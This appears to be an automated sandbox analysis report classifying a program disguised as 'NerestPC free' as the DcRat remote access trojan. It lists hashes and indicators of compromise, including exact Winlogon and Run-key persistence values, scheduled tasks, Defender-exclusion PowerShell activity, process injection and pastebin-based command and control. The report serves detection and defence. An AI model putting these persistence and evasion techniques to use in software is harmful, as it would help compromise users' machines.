Overview
overview
10Static
static
3NerestPC f....1.exe
windows7-x64
10NerestPC f....1.exe
windows10-2004-x64
10NerestPC f...db.dll
ubuntu-24.04-amd64
NerestPC f...pi.dll
windows7-x64
3NerestPC f...pi.dll
windows10-2004-x64
3NerestPC f...pi.dll
windows7-x64
3NerestPC f...pi.dll
windows10-2004-x64
3NerestPC f...db.exe
windows7-x64
3NerestPC f...db.exe
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
NerestPC free/NerestPCFree 0.31.1.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
NerestPC free/NerestPCFree 0.31.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
NerestPC free/bin/Adb.dll
Resource
ubuntu2404-amd64-20240523-en
Behavioral task
behavioral4
Sample
NerestPC free/bin/AdbWinApi.dll
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
NerestPC free/bin/AdbWinApi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
NerestPC free/bin/AdbWinUsbApi.dll
Resource
win7-20241010-en
Behavioral task
behavioral7
Sample
NerestPC free/bin/AdbWinUsbApi.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
NerestPC free/bin/adb.exe
Resource
win7-20241010-en
Behavioral task
behavioral9
Sample
NerestPC free/bin/adb.exe
Resource
win10v2004-20241007-en
General
-
Target
NerestPC free/NerestPCFree 0.31.1.exe
-
Size
7.0MB
-
MD5
9d0a77bd28d67eab798c50f0c6a24b64
-
SHA1
2de59eddd73ab784cc8f791cd96d7f81741ccae3
-
SHA256
a35479bc985fe56167b824f5d0d9ff96598af672afe8785bc9f87815c11393dc
-
SHA512
25ca283707b61c8149615f7e7958edb886378702ecbcf079191698d686b4a7a39d1be655e44ccf2752e569481e9eb25f3a10e59322c0c97c7e858fb5f9eabb17
-
SSDEEP
196608:i46iIYMaKuKGfjtVlQqtolrkiBJk3b8pA2uW3c:i7YpBDtVlmlgyJ0r
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Users\\Default User\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\fontwin\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Users\\Default User\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\", \"C:\\fontwin\\smss.exe\", \"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Users\\Default User\\SppExtComObj.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\", \"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\", \"C:\\Users\\Default User\\SppExtComObj.exe\", \"C:\\Recovery\\WindowsRE\\System.exe\"" MsServerHost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4328 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3588 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2264 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3612 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3488 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4600 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4184 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1864 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4288 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1588 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3240 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2300 3596 schtasks.exe 105 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 324 3596 schtasks.exe 105 -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 6044 created 2576 6044 WerFault.exe 159 PID 5956 created 3132 5956 WerFault.exe 161 -
Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs
description pid Process procid_target PID 1184 created 3396 1184 twain32.exe 56 PID 1184 created 3396 1184 twain32.exe 56 PID 1184 created 3396 1184 twain32.exe 56 PID 1184 created 3396 1184 twain32.exe 56 PID 1184 created 3396 1184 twain32.exe 56 PID 1184 created 3396 1184 twain32.exe 56 PID 448 created 3396 448 updater.exe 56 PID 448 created 3396 448 updater.exe 56 PID 448 created 3396 448 updater.exe 56 PID 448 created 3396 448 updater.exe 56 PID 448 created 3396 448 updater.exe 56 PID 448 created 3396 448 updater.exe 56 PID 5856 created 1788 5856 svchost.exe 188 PID 5856 created 3132 5856 svchost.exe 161 PID 5856 created 2576 5856 svchost.exe 159 -
Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4824 powershell.exe 4460 powershell.exe 1956 powershell.exe 1488 powershell.exe 4896 powershell.exe 4688 powershell.exe 4348 powershell.exe 3132 powershell.exe 2576 powershell.exe 1884 powershell.exe 1964 powershell.exe 216 powershell.exe 1872 powershell.exe 3844 powershell.exe 5012 powershell.exe 1788 powershell.exe 856 powershell.exe 3340 powershell.exe 4952 powershell.exe 392 powershell.exe 2940 powershell.exe 2392 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation NerestPCFree 0.31.1.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation MpDefenderCoreService.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation MsServerHost.exe -
Executes dropped EXE 5 IoCs
pid Process 848 MpDefenderCoreService.exe 1184 twain32.exe 448 updater.exe 3104 MsServerHost.exe 1912 fontdrvhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Users\\Default User\\SppExtComObj.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\WindowsRE\\System.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\fontwin\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\appcompat\\encapsulation\\upfc.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Recovery\\WindowsRE\\System.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\fontwin\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Recovery\\WindowsRE\\fontdrvhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Users\\Default User\\SppExtComObj.exe\"" MsServerHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 15 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 448 powercfg.exe 2428 powercfg.exe 5052 powercfg.exe 3760 powercfg.exe 4004 powercfg.exe 3588 cmd.exe 212 powercfg.exe 4832 powercfg.exe 4764 powercfg.exe 1632 cmd.exe -
Drops file in System32 directory 28 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\smss svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\fontdrvhostf svchost.exe File opened for modification C:\Windows\System32\Tasks\smsss svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\upfc svchost.exe File opened for modification C:\Windows\System32\Tasks\SppExtComObjS svchost.exe File opened for modification C:\Windows\System32\Tasks\System svchost.exe File opened for modification C:\Windows\System32\Tasks\SppExtComObj svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHostM svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created \??\c:\Windows\System32\ljh0xx.exe csc.exe File opened for modification C:\Windows\System32\Tasks\upfcu svchost.exe File opened for modification C:\Windows\System32\Tasks\SystemS svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\fontdrvhost svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File created \??\c:\Windows\System32\CSCD53789BDBD44C09F265DD55BD213.TMP csc.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1184 set thread context of 3340 1184 twain32.exe 98 PID 448 set thread context of 1140 448 updater.exe 120 PID 448 set thread context of 1904 448 updater.exe 127 PID 448 set thread context of 1216 448 updater.exe 128 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Chrome\updater.exe twain32.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\appcompat\encapsulation\upfc.exe MsServerHost.exe File created C:\Windows\appcompat\encapsulation\ea1d8f6d871115 MsServerHost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3216 sc.exe 3236 sc.exe 5060 sc.exe 2700 sc.exe 3284 sc.exe 3840 sc.exe 3596 sc.exe 4200 sc.exe 4268 sc.exe 3148 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NerestPCFree 0.31.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02xkaaaxbstnlkqi\DeviceId = "<Data LastUpdatedTime=\"1734195659\"><User username=\"02XKAAAXBSTNLKQI\"/></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02xkaaaxbstnlkqi" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates dialer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734195717" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02xkaaaxbstnlkqi svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02xkaaaxbstnlkqi\DeviceId = "<Data LastUpdatedTime=\"1734195659\"><User username=\"02XKAAAXBSTNLKQI\"><HardwareInfo BoundTime=\"1734195660\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028F791C-9EDF-47B3-B697-8CBCC2DA956D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings MpDefenderCoreService.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings MsServerHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3240 schtasks.exe 324 schtasks.exe 4328 schtasks.exe 4672 schtasks.exe 1864 schtasks.exe 5100 schtasks.exe 4184 schtasks.exe 1588 schtasks.exe 2300 schtasks.exe 3588 schtasks.exe 4244 schtasks.exe 4288 schtasks.exe 4600 schtasks.exe 2568 schtasks.exe 3332 schtasks.exe 2264 schtasks.exe 3612 schtasks.exe 3488 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1184 twain32.exe 1184 twain32.exe 856 powershell.exe 856 powershell.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 1184 twain32.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 3340 dialer.exe 2940 powershell.exe 1184 twain32.exe 1184 